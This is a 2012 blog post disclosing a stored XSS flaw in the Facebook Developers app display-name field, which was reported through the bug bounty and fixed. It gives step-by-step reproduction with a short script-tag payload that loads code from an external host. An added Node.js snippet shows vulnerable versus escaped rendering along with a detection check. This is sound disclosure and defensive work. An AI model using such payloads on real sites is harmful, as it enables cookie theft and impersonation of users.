Saturday, October 13, 2012

Stored XSS on Facebook Developers

A month ago, I discovered a stored XSS vulnerability on the Facebook Developers website. Even though a developer's page can only be accessed by the application's developers, an attacker could easily grant other users permission to view the page by inviting them to become team members. Once the users became team members, the attacker would be able to exploit the vulnerability and steal their cookies to spoof their identities. The attacker would also be able to change the content displayed on the developer's page.

The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
  1. I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
  2. I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
  3. I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
  4. I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
  5. I opened the Action Types section.
  6. An alert popup showing "/XSSed/" was displayed on my browser; the script was activated.
I then created a test user account and invited it to take on an admin role for the application. The test user account represented an unsuspecting victim. By clicking on just one button to accept the role, the test user gained permission to access the malicious page. I was able to confirm that the script was activated on that account as well.
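As an added illustration (not the original post's code, nor Facebook's), the following Node.js snippet renders the 32-character display name from step 3 with and without HTML output encoding, the server-side fix this field needs; the template fragments and the check function are assumed for the example:

```javascript
// Added example: rendering an untrusted application display name into HTML.
// The payload is the one quoted in the write-up. It fits the 32-character
// limit and ends with "<!--", which comments out whatever markup follows
// so the injected script element stays well-formed.
const DISPLAY_NAME_PAYLOAD = "<script src=//goo.gl/p3skt/><!--";

// Vulnerable rendering: the display name is concatenated straight into the
// page, so markup in the name becomes markup in the document (assumed template).
function renderUnsafe(displayName) {
  return `<h2 class="app-title">${displayName}</h2><p>Action Types</p>`;
}

// Hardened rendering: encode the HTML-significant characters before the
// value is placed inside an element's text content.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSafe(displayName) {
  return `<h2 class="app-title">${escapeHtml(displayName)}</h2><p>Action Types</p>`;
}

// Simple regression check for a test suite: did a script element or an
// injected comment opener reach the rendered markup?
function containsInjectedMarkup(html) {
  return /<script\b/i.test(html) || /<!--/.test(html);
}

console.log("unsafe:", containsInjectedMarkup(renderUnsafe(DISPLAY_NAME_PAYLOAD)));
console.log("safe:  ", containsInjectedMarkup(renderSafe(DISPLAY_NAME_PAYLOAD)));
```

Text-node encoding is only correct for this context; a name placed inside an attribute or a script block needs that context's encoder instead.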

This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.